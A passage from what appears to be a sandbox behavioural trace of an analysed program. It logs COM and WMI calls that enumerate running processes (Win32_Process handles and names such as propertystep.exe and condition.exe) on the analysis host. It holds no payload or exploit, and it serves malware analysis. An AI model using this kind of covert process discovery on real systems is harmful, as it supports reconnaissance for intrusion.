[6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f160) returned 0x0 [0213.349] WbemDefPath:IUnknown:Release (This=0x5612288) returned 0x0 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f160) returned 0x0 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.349] WbemDefPath:IUnknown:AddRef (This=0x560f160) returned 0x3 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612298) returned 0x0 [0213.349] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612298, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.349] WbemDefPath:IUnknown:Release (This=0x5612298) returned 0x3 [0213.349] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.349] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.349] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.349] WbemDefPath:IUnknown:Release (This=0x560f160) returned 0x2 [0213.350] WbemDefPath:IUnknown:Release (This=0x560f160) returned 0x1 [0213.350] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.350] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.350] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f160, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f160) returned 0x0 [0213.350] WbemDefPath:IUnknown:AddRef (This=0x560f160) returned 0x3 [0213.350] WbemDefPath:IUnknown:Release (This=0x560f160) returned 0x2 [0213.350] WbemDefPath:IWbemPath:SetText (This=0x560f160, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2324\"") returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.350] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.350] IWbemClassObject:Get (in: This=0x5612900, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2680a5c*=0, plFlavor=0x2680a60*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="propertystep.exe", varVal2=0x0), pType=0x2680a5c*=8, plFlavor=0x2680a60*=0) returned 0x0 [0213.350] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0213.350] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0213.350] IWbemClassObject:Get (in: This=0x5612900, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2680a5c*=8, plFlavor=0x2680a60*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="propertystep.exe", varVal2=0x0), pType=0x2680a5c*=8, plFlavor=0x2680a60*=0) returned 0x0 [0213.350] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0213.350] SysStringByteLen (bstr="propertystep.exe") returned 0x20 [0213.350] CoTaskMemAlloc (cb=0x4) returned 0x56122c8 [0213.350] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56122c8, puReturned=0x267acc0 | out: apObjects=0x56122c8*=0x5612d68, puReturned=0x267acc0*=0x1) returned 0x0 [0213.351] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5612d68) returned 0x0 [0213.351] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.351] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.352] IUnknown:AddRef (This=0x5612d68) returned 0x3 [0213.352] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.352] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.352] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5612d6c) returned 0x0 [0213.352] IMarshal:GetUnmarshalClass (in: This=0x5612d6c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.352] IUnknown:Release (This=0x5612d6c) returned 0x3 [0213.352] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.352] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.352] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.352] IUnknown:Release (This=0x5612d68) returned 0x2 [0213.352] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.352] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.352] IUnknown:QueryInterface (in: This=0x5612d68, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5612d68) returned 0x0 [0213.352] IUnknown:AddRef (This=0x5612d68) returned 0x4 [0213.352] IUnknown:Release (This=0x5612d68) returned 0x3 [0213.352] IUnknown:Release (This=0x5612d68) returned 0x2 [0213.352] CoTaskMemFree (pv=0x56122c8) [0213.352] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.352] IUnknown:AddRef (This=0x5612d68) returned 0x3 [0213.353] IWbemClassObject:Get (in: This=0x5612d68, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.353] IWbemClassObject:Get (in: This=0x5612d68, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.353] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0213.353] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x66 [0213.353] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.353] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.353] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.353] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.354] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56122c8) returned 0x0 [0213.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x56122c8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.354] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56122c8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f240) returned 0x0 [0213.354] WbemDefPath:IUnknown:Release (This=0x56122c8) returned 0x0 [0213.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f240) returned 0x0 [0213.354] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.355] WbemDefPath:IUnknown:AddRef (This=0x560f240) returned 0x3 [0213.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56122d8) returned 0x0 [0213.355] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56122d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.355] WbemDefPath:IUnknown:Release (This=0x56122d8) returned 0x3 [0213.355] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.355] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.355] WbemDefPath:IUnknown:Release (This=0x560f240) returned 0x2 [0213.355] WbemDefPath:IUnknown:Release (This=0x560f240) returned 0x1 [0213.355] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.355] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.355] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f240, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f240) returned 0x0 [0213.355] WbemDefPath:IUnknown:AddRef (This=0x560f240) returned 0x3 [0213.356] WbemDefPath:IUnknown:Release (This=0x560f240) returned 0x2 [0213.356] WbemDefPath:IWbemPath:SetText (This=0x560f240, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2336\"") returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.356] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.356] IWbemClassObject:Get (in: This=0x5612d68, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26812e0*=0, plFlavor=0x26812e4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="condition.exe", varVal2=0x0), pType=0x26812e0*=8, plFlavor=0x26812e4*=0) returned 0x0 [0213.356] SysStringByteLen (bstr="condition.exe") returned 0x1a [0213.356] SysStringByteLen (bstr="condition.exe") returned 0x1a [0213.356] IWbemClassObject:Get (in: This=0x5612d68, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26812e0*=8, plFlavor=0x26812e4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="condition.exe", varVal2=0x0), pType=0x26812e0*=8, plFlavor=0x26812e4*=0) returned 0x0 [0213.356] SysStringByteLen (bstr="condition.exe") returned 0x1a [0213.356] SysStringByteLen (bstr="condition.exe") returned 0x1a [0213.356] CoTaskMemAlloc (cb=0x4) returned 0x5612308 [0213.356] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612308, puReturned=0x267acc0 | out: apObjects=0x5612308*=0x56173b0, puReturned=0x267acc0*=0x1) returned 0x0 [0213.357] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x56173b0) returned 0x0 [0213.357] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.357] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.358] IUnknown:AddRef (This=0x56173b0) returned 0x3 [0213.358] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.358] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.358] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x56173b4) returned 0x0 [0213.358] IMarshal:GetUnmarshalClass (in: This=0x56173b4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.358] IUnknown:Release (This=0x56173b4) returned 0x3 [0213.358] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.358] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.358] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.358] IUnknown:Release (This=0x56173b0) returned 0x2 [0213.358] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.358] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.358] IUnknown:QueryInterface (in: This=0x56173b0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x56173b0) returned 0x0 [0213.358] IUnknown:AddRef (This=0x56173b0) returned 0x4 [0213.358] IUnknown:Release (This=0x56173b0) returned 0x3 [0213.358] IUnknown:Release (This=0x56173b0) returned 0x2 [0213.358] CoTaskMemFree (pv=0x5612308) [0213.358] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.358] IUnknown:AddRef (This=0x56173b0) returned 0x3 [0213.359] IWbemClassObject:Get (in: This=0x56173b0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.359] IWbemClassObject:Get (in: This=0x56173b0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.359] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x66 [0213.359] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2348\"") returned 0x66 [0213.359] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.359] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.359] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.359] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.360] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, 